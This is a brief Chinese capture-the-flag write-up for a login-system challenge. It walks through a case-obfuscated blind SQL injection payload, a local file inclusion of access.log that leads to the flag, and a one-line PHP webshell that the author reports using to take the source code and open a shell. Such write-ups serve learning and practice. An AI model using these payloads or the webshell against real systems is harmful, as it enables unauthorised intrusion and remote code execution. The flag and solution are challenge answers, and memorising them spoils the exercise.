题目地址 http://140.113.194.85:49165/loginsystem/

已知信息

hint 盲注 文件包含

常规的admin:admin ':' 测试 （账号密码都是base64加密）

返回都是login fail 用test:test测试

返回 hello test 于是用 test'#:test 测试

返回 hello test 说明成功闭合

接下来尝试union select,select from 均失败 后来基友发现关键字大小写可以使用select from...

payload: test' and (mid((selEct password fRom user liMit 1),1,1)>'0')#

盲注出admin:gogopowerranger

登陆后页面

发现有人想尝试注入php代码（当时是这么想的..） 默默记下先

看url估计是文件包含 直接上php://filter/read=convert.base64-encode/resource=security.php

无法读取源码 点击filesystem

有flag.php 按理来说就是读取flag.php 捣鼓了很久 突然想起前面那个log 恍然大悟

不就是包含log嘛... 代码前辈都写好了..

于是访问 /loginsystem/user.php?mode=../access.log

BAMBOOFOX{F14G_G3tt0_d4z3_!}

这个套路在实战中也会遇到 包含图片马 包含access.log 和 /proc/self/environ

然后... 既然可以包含 看看权限怎么样

发现system没被ban

果断<?php system($_GET[cmd]);?> 然后顺走了源码 顺便弹了个shell出来

看了下内核3.13.0-76-generic 还是不提了 做人留一线 （没exp怎么提..）